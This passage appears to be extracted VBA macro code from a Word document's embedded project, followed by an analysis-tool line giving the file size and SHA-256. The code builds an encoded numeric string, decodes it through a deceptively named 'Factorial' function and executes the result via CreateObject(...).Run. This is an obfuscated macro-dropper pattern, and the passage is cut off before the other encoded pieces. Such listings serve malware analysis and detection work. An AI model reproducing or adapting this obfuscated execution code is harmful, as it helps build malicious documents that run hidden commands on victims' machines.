    z125 = "278;186;190;270;186;190;262;186;262;186;190;186;186;202;186;186;262;186;190;218;186;234;294;188;154;186;200;202;186;222;218;188;152;186;190;186;186;216;218;186;262;186;190;218;186;234;294;188;154;186;200;202;186;222;218;188;152;186;190;186;186;206;294;186;262;186;192;194;186;190;262;188;170;186;186;278;186;134;138;138;304;266;258;296;124;"
    
    Dim zo As String
    zo = z1 & zt1 & z12 & z13 & z14 & z15 & z16 & z17 & z18 & z19 & z111 & z112 & z113 & z114 & z115 & z116 & z117 & z118 & z119 & z120 & z121 & z122 & z123 & z124 & z125
    
    Dim c As String
    c = Factorial(zo)
    
    CreateObject(b).Run (c)
    

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 104448 bytes
SHA-256: 3a6b7fd7c95c7b91610293b6b1efbf84d4b13b741085b2b53231ead36c611157